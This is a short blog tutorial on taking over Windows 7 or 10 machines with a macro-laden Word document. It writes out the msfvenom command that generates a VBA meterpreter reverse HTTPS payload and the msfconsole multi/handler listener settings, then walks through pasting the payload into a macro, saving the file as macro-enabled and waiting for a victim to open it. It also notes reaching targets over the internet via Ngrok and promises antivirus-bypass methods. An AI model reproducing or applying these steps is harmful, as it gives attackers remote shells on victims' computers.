Hack Windows Machine with Malicious Word Document


The idea here to hack windows 7 or 10 with a simple word document file running macros inside it, but as I said on the top of the topic, this machine has to be with low security system or not updated on a regular basis.

Let’s start by creating the malicious code with “msfvenom”:

msfvenom -p windows/meterpreter/reverse_https lhost= lport=4444 -f vba

copy the out put of the code, we’re going to pate it inside the macro of the word document file. Now let’s start the listener port for the reverse shell using “msfconsole”:

The configuration should be as follow:

use multi/handler

set payload windows/meterpreter/reverse_https

set lhost <your IP>

set lport <your port>

Now let’s open Word on your windows machine and go to “view” then click on “macro” then give it a name “Test” and then create:

Now past the code from the “msvenome” inside the macro section:

Save it with any name but as “Word Macro-Enabled Document:

Now on the Linux machine terminal, just type “exploit” and we wait for the victim to open the Word file “in this case we are the victim”:

Now as soon as the file is opened, we will get a reverse shell back:

Keep in mind this method is 50/50 chance to work, in some cases it worked with me even on WAN network using Ngrok, and sometimes the anti-virus caught it on running.

There are some other methods to bypass the AV, I will try to write about them in the future.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s